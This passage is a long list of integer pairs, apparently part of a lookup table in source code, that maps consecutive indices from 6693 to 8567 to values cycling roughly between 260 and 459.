(6693, 340),
(6694, 341),
(6695, 341),
(6696, 341),
(6697, 341),
(6698, 341),
(6699, 341),
(6700, 342),
(6701, 342),
(6702, 342),
(6703, 342),
(6704, 342),
(6705, 342),
(6706, 343),
(6707, 343),
(6708, 343),
(6709, 343),
(6710, 343),
(6711, 343),
(6712, 344),
(6713, 344),
(6714, 344),
(6715, 344),
(6716, 344),
(6717, 344),
(6718, 345),
(6719, 345),
(6720, 345),
(6721, 345),
(6722, 345),
(6723, 345),
(6724, 346),
(6725, 346),
(6726, 346),
(6727, 346),
(6728, 346),
(6729, 346),
(6730, 347),
(6731, 347),
(6732, 347),
(6733, 347),
(6734, 347),
(6735, 347),
(6736, 347),
(6737, 347),
(6738, 347),
(6739, 348),
(6740, 348),
(6741, 348),
(6742, 348),
(6743, 348),
(6744, 348),
(6745, 349),
(6746, 349),
(6747, 349),
(6748, 349),
(6749, 349),
(6750, 349),
(6751, 350),
(6752, 350),
(6753, 350),
(6754, 350),
(6755, 350),
(6756, 350),
(6757, 351),
(6758, 351),
(6759, 351),
(6760, 351),
(6761, 351),
(6762, 351),
(6763, 352),
(6764, 352),
(6765, 352),
(6766, 352),
(6767, 352),
(6768, 352),
(6769, 353),
(6770, 353),
(6771, 353),
(6772, 353),
(6773, 353),
(6774, 353),
(6775, 354),
(6776, 354),
(6777, 354),
(6778, 354),
(6779, 354),
(6780, 354),
(6781, 355),
(6782, 355),
(6783, 355),
(6784, 355),
(6785, 355),
(6786, 355),
(6787, 356),
(6788, 356),
(6789, 356),
(6790, 356),
(6791, 356),
(6792, 356),
(6793, 357),
(6794, 357),
(6795, 357),
(6796, 357),
(6797, 357),
(6798, 357),
(6799, 358),
(6800, 358),
(6801, 358),
(6802, 358),
(6803, 358),
(6804, 358),
(6805, 359),
(6806, 359),
(6807, 359),
(6808, 359),
(6809, 359),
(6810, 359),
(6811, 260),
(6812, 260),
(6813, 261),
(6814, 261),
(6815, 262),
(6816, 262),
(6817, 263),
(6818, 263),
(6819, 264),
(6820, 264),
(6821, 265),
(6822, 265),
(6823, 266),
(6824, 266),
(6825, 267),
(6826, 268),
(6827, 268),
(6828, 269),
(6829, 269),
(6830, 270),
(6831, 270),
(6832, 271),
(6833, 271),
(6834, 272),
(6835, 272),
(6836, 273),
(6837, 273),
(6838, 274),
(6839, 274),
(6840, 275),
(6841, 275),
(6842, 276),
(6843, 276),
(6844, 277),
(6845, 277),
(6846, 278),
(6847, 278),
(6848, 279),
(6849, 279),
(6850, 280),
(6851, 280),
(6852, 281),
(6853, 281),
(6854, 282),
(6855, 282),
(6856, 283),
(6857, 284),
(6858, 284),
(6859, 285),
(6860, 285),
(6861, 286),
(6862, 286),
(6863, 287),
(6864, 287),
(6865, 288),
(6866, 288),
(6867, 289),
(6868, 289),
(6869, 290),
(6870, 290),
(6871, 291),
(6872, 291),
(6873, 292),
(6874, 292),
(6875, 293),
(6876, 293),
(6877, 294),
(6878, 294),
(6879, 295),
(6880, 295),
(6881, 296),
(6882, 296),
(6883, 297),
(6884, 297),
(6885, 298),
(6886, 298),
(6887, 299),
(6888, 300),
(6889, 300),
(6890, 301),
(6891, 301),
(6892, 302),
(6893, 302),
(6894, 303),
(6895, 303),
(6896, 304),
(6897, 304),
(6898, 305),
(6899, 305),
(6900, 306),
(6901, 306),
(6902, 307),
(6903, 307),
(6904, 308),
(6905, 308),
(6906, 309),
(6907, 309),
(6908, 310),
(6909, 310),
(6910, 311),
(6911, 311),
(6912, 312),
(6913, 312),
(6914, 313),
(6915, 313),
(6916, 314),
(6917, 314),
(6918, 315),
(6919, 316),
(6920, 316),
(6921, 317),
(6922, 317),
(6923, 318),
(6924, 318),
(6925, 319),
(6926, 319),
(6927, 320),
(6928, 320),
(6929, 321),
(6930, 321),
(6931, 322),
(6932, 322),
(6933, 323),
(6934, 323),
(6935, 324),
(6936, 324),
(6937, 325),
(6938, 325),
(6939, 326),
(6940, 326),
(6941, 327),
(6942, 327),
(6943, 328),
(6944, 328),
(6945, 329),
(6946, 329),
(6947, 330),
(6948, 330),
(6949, 331),
(6950, 332),
(6951, 332),
(6952, 333),
(6953, 333),
(6954, 334),
(6955, 334),
(6956, 335),
(6957, 335),
(6958, 336),
(6959, 336),
(6960, 337),
(6961, 337),
(6962, 338),
(6963, 338),
(6964, 339),
(6965, 339),
(6966, 340),
(6967, 340),
(6968, 341),
(6969, 341),
(6970, 342),
(6971, 342),
(6972, 343),
(6973, 343),
(6974, 344),
(6975, 344),
(6976, 345),
(6977, 345),
(6978, 346),
(6979, 346),
(6980, 347),
(6981, 348),
(6982, 348),
(6983, 349),
(6984, 349),
(6985, 350),
(6986, 350),
(6987, 351),
(6988, 351),
(6989, 352),
(6990, 352),
(6991, 353),
(6992, 353),
(6993, 354),
(6994, 354),
(6995, 355),
(6996, 355),
(6997, 356),
(6998, 356),
(6999, 357),
(7000, 357),
(7001, 358),
(7002, 358),
(7003, 359),
(7004, 359),
(7005, 360),
(7006, 361),
(7007, 362),
(7008, 363),
(7009, 364),
(7010, 365),
(7011, 366),
(7012, 367),
(7013, 368),
(7014, 369),
(7015, 370),
(7016, 371),
(7017, 372),
(7018, 373),
(7019, 374),
(7020, 375),
(7021, 376),
(7022, 377),
(7023, 378),
(7024, 379),
(7025, 380),
(7026, 381),
(7027, 382),
(7028, 383),
(7029, 384),
(7030, 385),
(7031, 386),
(7032, 387),
(7033, 388),
(7034, 389),
(7035, 390),
(7036, 391),
(7037, 392),
(7038, 393),
(7039, 394),
(7040, 395),
(7041, 396),
(7042, 397),
(7043, 398),
(7044, 399),
(7045, 400),
(7046, 401),
(7047, 402),
(7048, 403),
(7049, 404),
(7050, 405),
(7051, 406),
(7052, 407),
(7053, 408),
(7054, 409),
(7055, 410),
(7056, 411),
(7057, 412),
(7058, 413),
(7059, 414),
(7060, 415),
(7061, 416),
(7062, 417),
(7063, 418),
(7064, 419),
(7065, 420),
(7066, 421),
(7067, 422),
(7068, 423),
(7069, 424),
(7070, 425),
(7071, 426),
(7072, 427),
(7073, 428),
(7074, 429),
(7075, 430),
(7076, 431),
(7077, 432),
(7078, 433),
(7079, 434),
(7080, 435),
(7081, 436),
(7082, 437),
(7083, 438),
(7084, 439),
(7085, 440),
(7086, 441),
(7087, 442),
(7088, 443),
(7089, 444),
(7090, 445),
(7091, 446),
(7092, 447),
(7093, 448),
(7094, 449),
(7095, 450),
(7096, 451),
(7097, 452),
(7098, 453),
(7099, 454),
(7100, 455),
(7101, 456),
(7102, 457),
(7103, 458),
(7104, 459),
(7105, 360),
(7106, 361),
(7107, 362),
(7108, 362),
(7109, 362),
(7110, 363),
(7111, 363),
(7112, 363),
(7113, 364),
(7114, 365),
(7115, 366),
(7116, 366),
(7117, 366),
(7118, 367),
(7119, 368),
(7120, 369),
(7121, 369),
(7122, 369),
(7123, 370),
(7124, 371),
(7125, 372),
(7126, 372),
(7127, 372),
(7128, 373),
(7129, 374),
(7130, 375),
(7131, 375),
(7132, 375),
(7133, 376),
(7134, 377),
(7135, 378),
(7136, 378),
(7137, 378),
(7138, 379),
(7139, 379),
(7140, 379),
(7141, 380),
(7142, 380),
(7143, 380),
(7144, 381),
(7145, 382),
(7146, 383),
(7147, 383),
(7148, 383),
(7149, 384),
(7150, 385),
(7151, 386),
(7152, 386),
(7153, 386),
(7154, 387),
(7155, 388),
(7156, 389),
(7157, 389),
(7158, 389),
(7159, 390),
(7160, 391),
(7161, 392),
(7162, 392),
(7163, 392),
(7164, 393),
(7165, 394),
(7166, 395),
(7167, 395),
(7168, 395),
(7169, 396),
(7170, 396),
(7171, 396),
(7172, 397),
(7173, 398),
(7174, 399),
(7175, 399),
(7176, 399),
(7177, 400),
(7178, 401),
(7179, 402),
(7180, 402),
(7181, 402),
(7182, 403),
(7183, 404),
(7184, 405),
(7185, 405),
(7186, 405),
(7187, 406),
(7188, 407),
(7189, 408),
(7190, 408),
(7191, 408),
(7192, 409),
(7193, 410),
(7194, 411),
(7195, 411),
(7196, 411),
(7197, 412),
(7198, 412),
(7199, 412),
(7200, 413),
(7201, 414),
(7202, 415),
(7203, 415),
(7204, 415),
(7205, 416),
(7206, 417),
(7207, 418),
(7208, 418),
(7209, 418),
(7210, 419),
(7211, 420),
(7212, 421),
(7213, 421),
(7214, 421),
(7215, 422),
(7216, 423),
(7217, 424),
(7218, 424),
(7219, 424),
(7220, 425),
(7221, 426),
(7222, 427),
(7223, 427),
(7224, 427),
(7225, 428),
(7226, 429),
(7227, 430),
(7228, 430),
(7229, 430),
(7230, 431),
(7231, 432),
(7232, 433),
(7233, 433),
(7234, 433),
(7235, 434),
(7236, 435),
(7237, 436),
(7238, 436),
(7239, 436),
(7240, 437),
(7241, 438),
(7242, 439),
(7243, 439),
(7244, 439),
(7245, 440),
(7246, 441),
(7247, 442),
(7248, 442),
(7249, 442),
(7250, 443),
(7251, 443),
(7252, 443),
(7253, 444),
(7254, 445),
(7255, 445),
(7256, 446),
(7257, 447),
(7258, 448),
(7259, 448),
(7260, 449),
(7261, 450),
(7262, 451),
(7263, 451),
(7264, 452),
(7265, 453),
(7266, 454),
(7267, 454),
(7268, 455),
(7269, 456),
(7270, 457),
(7271, 457),
(7272, 458),
(7273, 459),
(7274, 459),
(7275, 360),
(7276, 360),
(7277, 360),
(7278, 360),
(7279, 360),
(7280, 360),
(7281, 360),
(7282, 361),
(7283, 361),
(7284, 361),
(7285, 361),
(7286, 361),
(7287, 361),
(7288, 361),
(7289, 362),
(7290, 362),
(7291, 362),
(7292, 362),
(7293, 362),
(7294, 362),
(7295, 362),
(7296, 363),
(7297, 363),
(7298, 363),
(7299, 363),
(7300, 363),
(7301, 363),
(7302, 363),
(7303, 363),
(7304, 363),
(7305, 363),
(7306, 363),
(7307, 364),
(7308, 364),
(7309, 364),
(7310, 364),
(7311, 364),
(7312, 364),
(7313, 364),
(7314, 365),
(7315, 365),
(7316, 365),
(7317, 365),
(7318, 365),
(7319, 365),
(7320, 365),
(7321, 366),
(7322, 366),
(7323, 366),
(7324, 366),
(7325, 366),
(7326, 366),
(7327, 366),
(7328, 367),
(7329, 367),
(7330, 367),
(7331, 367),
(7332, 367),
(7333, 367),
(7334, 367),
(7335, 368),
(7336, 368),
(7337, 368),
(7338, 368),
(7339, 368),
(7340, 368),
(7341, 368),
(7342, 369),
(7343, 369),
(7344, 369),
(7345, 369),
(7346, 369),
(7347, 369),
(7348, 369),
(7349, 370),
(7350, 370),
(7351, 370),
(7352, 370),
(7353, 370),
(7354, 370),
(7355, 370),
(7356, 371),
(7357, 371),
(7358, 371),
(7359, 371),
(7360, 371),
(7361, 371),
(7362, 371),
(7363, 372),
(7364, 372),
(7365, 372),
(7366, 372),
(7367, 372),
(7368, 372),
(7369, 372),
(7370, 373),
(7371, 373),
(7372, 373),
(7373, 373),
(7374, 373),
(7375, 373),
(7376, 373),
(7377, 374),
(7378, 374),
(7379, 374),
(7380, 374),
(7381, 374),
(7382, 374),
(7383, 374),
(7384, 375),
(7385, 375),
(7386, 375),
(7387, 375),
(7388, 375),
(7389, 375),
(7390, 375),
(7391, 376),
(7392, 376),
(7393, 376),
(7394, 376),
(7395, 376),
(7396, 376),
(7397, 376),
(7398, 377),
(7399, 377),
(7400, 377),
(7401, 377),
(7402, 377),
(7403, 377),
(7404, 377),
(7405, 378),
(7406, 378),
(7407, 378),
(7408, 378),
(7409, 378),
(7410, 378),
(7411, 378),
(7412, 379),
(7413, 379),
(7414, 379),
(7415, 379),
(7416, 379),
(7417, 379),
(7418, 379),
(7419, 379),
(7420, 379),
(7421, 379),
(7422, 379),
(7423, 380),
(7424, 380),
(7425, 380),
(7426, 380),
(7427, 380),
(7428, 380),
(7429, 380),
(7430, 381),
(7431, 381),
(7432, 381),
(7433, 381),
(7434, 381),
(7435, 381),
(7436, 381),
(7437, 382),
(7438, 382),
(7439, 382),
(7440, 382),
(7441, 382),
(7442, 382),
(7443, 382),
(7444, 383),
(7445, 383),
(7446, 383),
(7447, 383),
(7448, 383),
(7449, 383),
(7450, 383),
(7451, 384),
(7452, 384),
(7453, 384),
(7454, 384),
(7455, 384),
(7456, 384),
(7457, 384),
(7458, 385),
(7459, 385),
(7460, 385),
(7461, 385),
(7462, 385),
(7463, 385),
(7464, 385),
(7465, 386),
(7466, 386),
(7467, 386),
(7468, 386),
(7469, 386),
(7470, 386),
(7471, 386),
(7472, 387),
(7473, 387),
(7474, 387),
(7475, 387),
(7476, 387),
(7477, 387),
(7478, 387),
(7479, 388),
(7480, 388),
(7481, 388),
(7482, 388),
(7483, 388),
(7484, 388),
(7485, 388),
(7486, 389),
(7487, 389),
(7488, 389),
(7489, 389),
(7490, 389),
(7491, 389),
(7492, 389),
(7493, 390),
(7494, 390),
(7495, 390),
(7496, 390),
(7497, 390),
(7498, 390),
(7499, 390),
(7500, 391),
(7501, 391),
(7502, 391),
(7503, 391),
(7504, 391),
(7505, 391),
(7506, 391),
(7507, 392),
(7508, 392),
(7509, 392),
(7510, 392),
(7511, 392),
(7512, 392),
(7513, 392),
(7514, 393),
(7515, 393),
(7516, 393),
(7517, 393),
(7518, 393),
(7519, 393),
(7520, 393),
(7521, 394),
(7522, 394),
(7523, 394),
(7524, 394),
(7525, 394),
(7526, 394),
(7527, 394),
(7528, 395),
(7529, 395),
(7530, 395),
(7531, 395),
(7532, 395),
(7533, 395),
(7534, 395),
(7535, 395),
(7536, 395),
(7537, 395),
(7538, 395),
(7539, 396),
(7540, 396),
(7541, 396),
(7542, 396),
(7543, 396),
(7544, 396),
(7545, 396),
(7546, 397),
(7547, 397),
(7548, 397),
(7549, 397),
(7550, 397),
(7551, 397),
(7552, 397),
(7553, 398),
(7554, 398),
(7555, 398),
(7556, 398),
(7557, 398),
(7558, 398),
(7559, 398),
(7560, 399),
(7561, 399),
(7562, 399),
(7563, 399),
(7564, 399),
(7565, 399),
(7566, 399),
(7567, 400),
(7568, 400),
(7569, 400),
(7570, 400),
(7571, 400),
(7572, 400),
(7573, 400),
(7574, 401),
(7575, 401),
(7576, 401),
(7577, 401),
(7578, 401),
(7579, 401),
(7580, 401),
(7581, 402),
(7582, 402),
(7583, 402),
(7584, 402),
(7585, 402),
(7586, 402),
(7587, 402),
(7588, 403),
(7589, 403),
(7590, 403),
(7591, 403),
(7592, 403),
(7593, 403),
(7594, 403),
(7595, 404),
(7596, 404),
(7597, 404),
(7598, 404),
(7599, 404),
(7600, 404),
(7601, 404),
(7602, 405),
(7603, 405),
(7604, 405),
(7605, 405),
(7606, 405),
(7607, 405),
(7608, 405),
(7609, 406),
(7610, 406),
(7611, 406),
(7612, 406),
(7613, 406),
(7614, 406),
(7615, 406),
(7616, 407),
(7617, 407),
(7618, 407),
(7619, 407),
(7620, 407),
(7621, 407),
(7622, 407),
(7623, 408),
(7624, 408),
(7625, 408),
(7626, 408),
(7627, 408),
(7628, 408),
(7629, 408),
(7630, 409),
(7631, 409),
(7632, 409),
(7633, 409),
(7634, 409),
(7635, 409),
(7636, 409),
(7637, 410),
(7638, 410),
(7639, 410),
(7640, 410),
(7641, 410),
(7642, 410),
(7643, 410),
(7644, 411),
(7645, 411),
(7646, 411),
(7647, 411),
(7648, 411),
(7649, 411),
(7650, 411),
(7651, 411),
(7652, 411),
(7653, 411),
(7654, 411),
(7655, 412),
(7656, 412),
(7657, 412),
(7658, 412),
(7659, 412),
(7660, 412),
(7661, 412),
(7662, 413),
(7663, 413),
(7664, 413),
(7665, 413),
(7666, 413),
(7667, 413),
(7668, 413),
(7669, 414),
(7670, 414),
(7671, 414),
(7672, 414),
(7673, 414),
(7674, 414),
(7675, 414),
(7676, 415),
(7677, 415),
(7678, 415),
(7679, 415),
(7680, 415),
(7681, 415),
(7682, 415),
(7683, 416),
(7684, 416),
(7685, 416),
(7686, 416),
(7687, 416),
(7688, 416),
(7689, 416),
(7690, 417),
(7691, 417),
(7692, 417),
(7693, 417),
(7694, 417),
(7695, 417),
(7696, 417),
(7697, 418),
(7698, 418),
(7699, 418),
(7700, 418),
(7701, 418),
(7702, 418),
(7703, 418),
(7704, 419),
(7705, 419),
(7706, 419),
(7707, 419),
(7708, 419),
(7709, 419),
(7710, 419),
(7711, 420),
(7712, 420),
(7713, 420),
(7714, 420),
(7715, 420),
(7716, 420),
(7717, 420),
(7718, 421),
(7719, 421),
(7720, 421),
(7721, 421),
(7722, 421),
(7723, 421),
(7724, 421),
(7725, 422),
(7726, 422),
(7727, 422),
(7728, 422),
(7729, 422),
(7730, 422),
(7731, 422),
(7732, 423),
(7733, 423),
(7734, 423),
(7735, 423),
(7736, 423),
(7737, 423),
(7738, 423),
(7739, 424),
(7740, 424),
(7741, 424),
(7742, 424),
(7743, 424),
(7744, 424),
(7745, 424),
(7746, 425),
(7747, 425),
(7748, 425),
(7749, 425),
(7750, 425),
(7751, 425),
(7752, 425),
(7753, 426),
(7754, 426),
(7755, 426),
(7756, 426),
(7757, 426),
(7758, 426),
(7759, 426),
(7760, 427),
(7761, 427),
(7762, 427),
(7763, 427),
(7764, 427),
(7765, 427),
(7766, 427),
(7767, 427),
(7768, 427),
(7769, 427),
(7770, 427),
(7771, 428),
(7772, 428),
(7773, 428),
(7774, 428),
(7775, 428),
(7776, 428),
(7777, 428),
(7778, 429),
(7779, 429),
(7780, 429),
(7781, 429),
(7782, 429),
(7783, 429),
(7784, 429),
(7785, 430),
(7786, 430),
(7787, 430),
(7788, 430),
(7789, 430),
(7790, 430),
(7791, 430),
(7792, 431),
(7793, 431),
(7794, 431),
(7795, 431),
(7796, 431),
(7797, 431),
(7798, 431),
(7799, 432),
(7800, 432),
(7801, 432),
(7802, 432),
(7803, 432),
(7804, 432),
(7805, 432),
(7806, 433),
(7807, 433),
(7808, 433),
(7809, 433),
(7810, 433),
(7811, 433),
(7812, 433),
(7813, 434),
(7814, 434),
(7815, 434),
(7816, 434),
(7817, 434),
(7818, 434),
(7819, 434),
(7820, 435),
(7821, 435),
(7822, 435),
(7823, 435),
(7824, 435),
(7825, 435),
(7826, 435),
(7827, 436),
(7828, 436),
(7829, 436),
(7830, 436),
(7831, 436),
(7832, 436),
(7833, 436),
(7834, 437),
(7835, 437),
(7836, 437),
(7837, 437),
(7838, 437),
(7839, 437),
(7840, 437),
(7841, 438),
(7842, 438),
(7843, 438),
(7844, 438),
(7845, 438),
(7846, 438),
(7847, 438),
(7848, 439),
(7849, 439),
(7850, 439),
(7851, 439),
(7852, 439),
(7853, 439),
(7854, 439),
(7855, 440),
(7856, 440),
(7857, 440),
(7858, 440),
(7859, 440),
(7860, 440),
(7861, 440),
(7862, 441),
(7863, 441),
(7864, 441),
(7865, 441),
(7866, 441),
(7867, 441),
(7868, 441),
(7869, 442),
(7870, 442),
(7871, 442),
(7872, 442),
(7873, 442),
(7874, 442),
(7875, 442),
(7876, 443),
(7877, 443),
(7878, 443),
(7879, 443),
(7880, 443),
(7881, 443),
(7882, 443),
(7883, 443),
(7884, 443),
(7885, 443),
(7886, 443),
(7887, 444),
(7888, 444),
(7889, 444),
(7890, 444),
(7891, 444),
(7892, 444),
(7893, 444),
(7894, 445),
(7895, 445),
(7896, 445),
(7897, 445),
(7898, 445),
(7899, 445),
(7900, 445),
(7901, 446),
(7902, 446),
(7903, 446),
(7904, 446),
(7905, 446),
(7906, 446),
(7907, 446),
(7908, 447),
(7909, 447),
(7910, 447),
(7911, 447),
(7912, 447),
(7913, 447),
(7914, 447),
(7915, 448),
(7916, 448),
(7917, 448),
(7918, 448),
(7919, 448),
(7920, 448),
(7921, 448),
(7922, 449),
(7923, 449),
(7924, 449),
(7925, 449),
(7926, 449),
(7927, 449),
(7928, 449),
(7929, 450),
(7930, 450),
(7931, 450),
(7932, 450),
(7933, 450),
(7934, 450),
(7935, 450),
(7936, 451),
(7937, 451),
(7938, 451),
(7939, 451),
(7940, 451),
(7941, 451),
(7942, 451),
(7943, 452),
(7944, 452),
(7945, 452),
(7946, 452),
(7947, 452),
(7948, 452),
(7949, 452),
(7950, 453),
(7951, 453),
(7952, 453),
(7953, 453),
(7954, 453),
(7955, 453),
(7956, 453),
(7957, 454),
(7958, 454),
(7959, 454),
(7960, 454),
(7961, 454),
(7962, 454),
(7963, 454),
(7964, 455),
(7965, 455),
(7966, 455),
(7967, 455),
(7968, 455),
(7969, 455),
(7970, 455),
(7971, 456),
(7972, 456),
(7973, 456),
(7974, 456),
(7975, 456),
(7976, 456),
(7977, 456),
(7978, 457),
(7979, 457),
(7980, 457),
(7981, 457),
(7982, 457),
(7983, 457),
(7984, 457),
(7985, 458),
(7986, 458),
(7987, 458),
(7988, 458),
(7989, 458),
(7990, 458),
(7991, 458),
(7992, 459),
(7993, 459),
(7994, 459),
(7995, 459),
(7996, 459),
(7997, 459),
(7998, 459),
(7999, 459),
(8000, 459),
(8001, 459),
(8002, 459),
(8003, 360),
(8004, 361),
(8005, 362),
(8006, 363),
(8007, 364),
(8008, 365),
(8009, 366),
(8010, 367),
(8011, 368),
(8012, 369),
(8013, 370),
(8014, 371),
(8015, 372),
(8016, 373),
(8017, 374),
(8018, 375),
(8019, 376),
(8020, 377),
(8021, 378),
(8022, 379),
(8023, 380),
(8024, 381),
(8025, 382),
(8026, 383),
(8027, 384),
(8028, 385),
(8029, 386),
(8030, 387),
(8031, 388),
(8032, 389),
(8033, 390),
(8034, 391),
(8035, 392),
(8036, 393),
(8037, 394),
(8038, 395),
(8039, 396),
(8040, 397),
(8041, 398),
(8042, 399),
(8043, 400),
(8044, 401),
(8045, 402),
(8046, 403),
(8047, 404),
(8048, 405),
(8049, 406),
(8050, 407),
(8051, 408),
(8052, 409),
(8053, 410),
(8054, 411),
(8055, 412),
(8056, 413),
(8057, 414),
(8058, 415),
(8059, 416),
(8060, 417),
(8061, 418),
(8062, 419),
(8063, 420),
(8064, 421),
(8065, 422),
(8066, 423),
(8067, 424),
(8068, 425),
(8069, 426),
(8070, 427),
(8071, 428),
(8072, 429),
(8073, 430),
(8074, 431),
(8075, 432),
(8076, 433),
(8077, 434),
(8078, 435),
(8079, 436),
(8080, 437),
(8081, 438),
(8082, 439),
(8083, 440),
(8084, 441),
(8085, 442),
(8086, 443),
(8087, 444),
(8088, 445),
(8089, 446),
(8090, 447),
(8091, 448),
(8092, 449),
(8093, 450),
(8094, 451),
(8095, 452),
(8096, 453),
(8097, 454),
(8098, 455),
(8099, 456),
(8100, 457),
(8101, 458),
(8102, 459),
(8103, 360),
(8104, 360),
(8105, 360),
(8106, 360),
(8107, 360),
(8108, 360),
(8109, 361),
(8110, 361),
(8111, 361),
(8112, 361),
(8113, 361),
(8114, 361),
(8115, 362),
(8116, 362),
(8117, 362),
(8118, 362),
(8119, 362),
(8120, 362),
(8121, 363),
(8122, 363),
(8123, 363),
(8124, 363),
(8125, 363),
(8126, 363),
(8127, 363),
(8128, 363),
(8129, 363),
(8130, 364),
(8131, 364),
(8132, 364),
(8133, 364),
(8134, 364),
(8135, 364),
(8136, 365),
(8137, 365),
(8138, 365),
(8139, 365),
(8140, 365),
(8141, 365),
(8142, 366),
(8143, 366),
(8144, 366),
(8145, 366),
(8146, 366),
(8147, 366),
(8148, 367),
(8149, 367),
(8150, 367),
(8151, 367),
(8152, 367),
(8153, 367),
(8154, 368),
(8155, 368),
(8156, 368),
(8157, 368),
(8158, 368),
(8159, 368),
(8160, 369),
(8161, 369),
(8162, 369),
(8163, 369),
(8164, 369),
(8165, 369),
(8166, 370),
(8167, 370),
(8168, 370),
(8169, 370),
(8170, 370),
(8171, 370),
(8172, 371),
(8173, 371),
(8174, 371),
(8175, 371),
(8176, 371),
(8177, 371),
(8178, 372),
(8179, 372),
(8180, 372),
(8181, 372),
(8182, 372),
(8183, 372),
(8184, 373),
(8185, 373),
(8186, 373),
(8187, 373),
(8188, 373),
(8189, 373),
(8190, 374),
(8191, 374),
(8192, 374),
(8193, 374),
(8194, 374),
(8195, 374),
(8196, 375),
(8197, 375),
(8198, 375),
(8199, 375),
(8200, 375),
(8201, 375),
(8202, 376),
(8203, 376),
(8204, 376),
(8205, 376),
(8206, 376),
(8207, 376),
(8208, 377),
(8209, 377),
(8210, 377),
(8211, 377),
(8212, 377),
(8213, 377),
(8214, 378),
(8215, 378),
(8216, 378),
(8217, 378),
(8218, 378),
(8219, 378),
(8220, 379),
(8221, 379),
(8222, 379),
(8223, 379),
(8224, 379),
(8225, 379),
(8226, 379),
(8227, 379),
(8228, 379),
(8229, 380),
(8230, 380),
(8231, 380),
(8232, 380),
(8233, 380),
(8234, 380),
(8235, 381),
(8236, 381),
(8237, 381),
(8238, 381),
(8239, 381),
(8240, 381),
(8241, 382),
(8242, 382),
(8243, 382),
(8244, 382),
(8245, 382),
(8246, 382),
(8247, 383),
(8248, 383),
(8249, 383),
(8250, 383),
(8251, 383),
(8252, 383),
(8253, 384),
(8254, 384),
(8255, 384),
(8256, 384),
(8257, 384),
(8258, 384),
(8259, 385),
(8260, 385),
(8261, 385),
(8262, 385),
(8263, 385),
(8264, 385),
(8265, 386),
(8266, 386),
(8267, 386),
(8268, 386),
(8269, 386),
(8270, 386),
(8271, 387),
(8272, 387),
(8273, 387),
(8274, 387),
(8275, 387),
(8276, 387),
(8277, 388),
(8278, 388),
(8279, 388),
(8280, 388),
(8281, 388),
(8282, 388),
(8283, 389),
(8284, 389),
(8285, 389),
(8286, 389),
(8287, 389),
(8288, 389),
(8289, 390),
(8290, 390),
(8291, 390),
(8292, 390),
(8293, 390),
(8294, 390),
(8295, 391),
(8296, 391),
(8297, 391),
(8298, 391),
(8299, 391),
(8300, 391),
(8301, 392),
(8302, 392),
(8303, 392),
(8304, 392),
(8305, 392),
(8306, 392),
(8307, 393),
(8308, 393),
(8309, 393),
(8310, 393),
(8311, 393),
(8312, 393),
(8313, 394),
(8314, 394),
(8315, 394),
(8316, 394),
(8317, 394),
(8318, 394),
(8319, 395),
(8320, 395),
(8321, 395),
(8322, 395),
(8323, 395),
(8324, 395),
(8325, 395),
(8326, 395),
(8327, 395),
(8328, 396),
(8329, 396),
(8330, 396),
(8331, 396),
(8332, 396),
(8333, 396),
(8334, 397),
(8335, 397),
(8336, 397),
(8337, 397),
(8338, 397),
(8339, 397),
(8340, 398),
(8341, 398),
(8342, 398),
(8343, 398),
(8344, 398),
(8345, 398),
(8346, 399),
(8347, 399),
(8348, 399),
(8349, 399),
(8350, 399),
(8351, 399),
(8352, 400),
(8353, 400),
(8354, 400),
(8355, 400),
(8356, 400),
(8357, 400),
(8358, 401),
(8359, 401),
(8360, 401),
(8361, 401),
(8362, 401),
(8363, 401),
(8364, 402),
(8365, 402),
(8366, 402),
(8367, 402),
(8368, 402),
(8369, 402),
(8370, 403),
(8371, 403),
(8372, 403),
(8373, 403),
(8374, 403),
(8375, 403),
(8376, 404),
(8377, 404),
(8378, 404),
(8379, 404),
(8380, 404),
(8381, 404),
(8382, 405),
(8383, 405),
(8384, 405),
(8385, 405),
(8386, 405),
(8387, 405),
(8388, 406),
(8389, 406),
(8390, 406),
(8391, 406),
(8392, 406),
(8393, 406),
(8394, 407),
(8395, 407),
(8396, 407),
(8397, 407),
(8398, 407),
(8399, 407),
(8400, 408),
(8401, 408),
(8402, 408),
(8403, 408),
(8404, 408),
(8405, 408),
(8406, 409),
(8407, 409),
(8408, 409),
(8409, 409),
(8410, 409),
(8411, 409),
(8412, 410),
(8413, 410),
(8414, 410),
(8415, 410),
(8416, 410),
(8417, 410),
(8418, 411),
(8419, 411),
(8420, 411),
(8421, 411),
(8422, 411),
(8423, 411),
(8424, 411),
(8425, 411),
(8426, 411),
(8427, 412),
(8428, 412),
(8429, 412),
(8430, 412),
(8431, 412),
(8432, 412),
(8433, 413),
(8434, 413),
(8435, 413),
(8436, 413),
(8437, 413),
(8438, 413),
(8439, 414),
(8440, 414),
(8441, 414),
(8442, 414),
(8443, 414),
(8444, 414),
(8445, 415),
(8446, 415),
(8447, 415),
(8448, 415),
(8449, 415),
(8450, 415),
(8451, 416),
(8452, 416),
(8453, 416),
(8454, 416),
(8455, 416),
(8456, 416),
(8457, 417),
(8458, 417),
(8459, 417),
(8460, 417),
(8461, 417),
(8462, 417),
(8463, 418),
(8464, 418),
(8465, 418),
(8466, 418),
(8467, 418),
(8468, 418),
(8469, 419),
(8470, 419),
(8471, 419),
(8472, 419),
(8473, 419),
(8474, 419),
(8475, 420),
(8476, 420),
(8477, 420),
(8478, 420),
(8479, 420),
(8480, 420),
(8481, 421),
(8482, 421),
(8483, 421),
(8484, 421),
(8485, 421),
(8486, 421),
(8487, 422),
(8488, 422),
(8489, 422),
(8490, 422),
(8491, 422),
(8492, 422),
(8493, 423),
(8494, 423),
(8495, 423),
(8496, 423),
(8497, 423),
(8498, 423),
(8499, 424),
(8500, 424),
(8501, 424),
(8502, 424),
(8503, 424),
(8504, 424),
(8505, 425),
(8506, 425),
(8507, 425),
(8508, 425),
(8509, 425),
(8510, 425),
(8511, 426),
(8512, 426),
(8513, 426),
(8514, 426),
(8515, 426),
(8516, 426),
(8517, 427),
(8518, 427),
(8519, 427),
(8520, 427),
(8521, 427),
(8522, 427),
(8523, 427),
(8524, 427),
(8525, 427),
(8526, 428),
(8527, 428),
(8528, 428),
(8529, 428),
(8530, 428),
(8531, 428),
(8532, 429),
(8533, 429),
(8534, 429),
(8535, 429),
(8536, 429),
(8537, 429),
(8538, 430),
(8539, 430),
(8540, 430),
(8541, 430),
(8542, 430),
(8543, 430),
(8544, 431),
(8545, 431),
(8546, 431),
(8547, 431),
(8548, 431),
(8549, 431),
(8550, 432),
(8551, 432),
(8552, 432),
(8553, 432),
(8554, 432),
(8555, 432),
(8556, 433),
(8557, 433),
(8558, 433),
(8559, 433),
(8560, 433),
(8561, 433),
(8562, 434),
(8563, 434),
(8564, 434),
(8565, 434),
(8566, 434),
(8567, 434),
